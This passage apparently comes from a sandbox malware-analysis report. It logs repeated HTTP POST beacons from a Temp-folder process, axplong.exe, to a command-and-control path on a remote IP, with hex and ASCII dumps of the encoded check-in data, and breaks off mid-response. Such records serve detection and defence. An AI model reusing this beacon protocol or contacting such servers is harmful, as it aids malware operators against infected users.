                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      10192.168.2.649731185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:15.540766954 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:16.278747082 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:16.279750109 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:16.526026011 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:16 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      11192.168.2.649732185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:16.634820938 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:17.435533047 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:17.436959028 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:17.683476925 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:17 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      12192.168.2.649733185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:17.790524006 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:18.540328979 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:18.541156054 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:18.788273096 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:18 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      13192.168.2.649734185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:18.908792019 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:19.694700956 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:19.695584059 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:19.946804047 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:19 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      14192.168.2.649735185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:20.057841063 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:20.808569908 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:20.811388969 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:21.058656931 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:20 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      15192.168.2.649737185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:21.182579994 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:21.943689108 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:21 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:21.944624901 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:22.195077896 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:22 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      16192.168.2.649738185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:22.508475065 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:23.267412901 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:23.268232107 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:23.579539061 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:23 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      17192.168.2.649739185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:23.697460890 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:24.446705103 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:24.447643995 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:24.822426081 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:24 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      18192.168.2.649740185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:24.936054945 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:25.850984097 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:25.852160931 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:26.133748055 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:25 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      19192.168.2.649741185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:26.244283915 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:26.995523930 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:26 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:26.996520042 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:27.258722067 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      20192.168.2.649742185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:27.369517088 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:28.113677025 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:27 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:28.114548922 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:28.362354040 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:28 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 7 <c><d>0


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      21192.168.2.649743185.215.113.16805608C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                      TimestampBytes transferredDirectionData
                      Jul 27, 2024 09:35:28.478334904 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 4
                      Cache-Control: no-cache
                      Data Raw: 73 74 3d 73
                      Data Ascii: st=s
                      Jul 27, 2024 09:35:29.219233990 CEST219INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:29 GMT
                      Content-Type: text/html; charset=UTF-8
                      Transfer-Encoding: chunked
                      Connection: keep-alive
                      Refresh: 0; url = Login.php
                      Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                      Data Ascii: 1 0
                      Jul 27, 2024 09:35:29.220431089 CEST314OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                      Content-Type: application/x-www-form-urlencoded
                      Host: 185.215.113.16
                      Content-Length: 160
                      Cache-Control: no-cache
                      Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 39 46 38 41 45 34 35 43 38 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30
                      Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C9F8AE45C8FAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                      Jul 27, 2024 09:35:29.468216896 CEST196INHTTP/1.1 200 OK
                      Server: nginx/1.18.0 (Ubuntu)
                      Date: Sat, 27 Jul 2024 07:35:29 GMT
                      Content-Type: text/html; charset=UTF-8
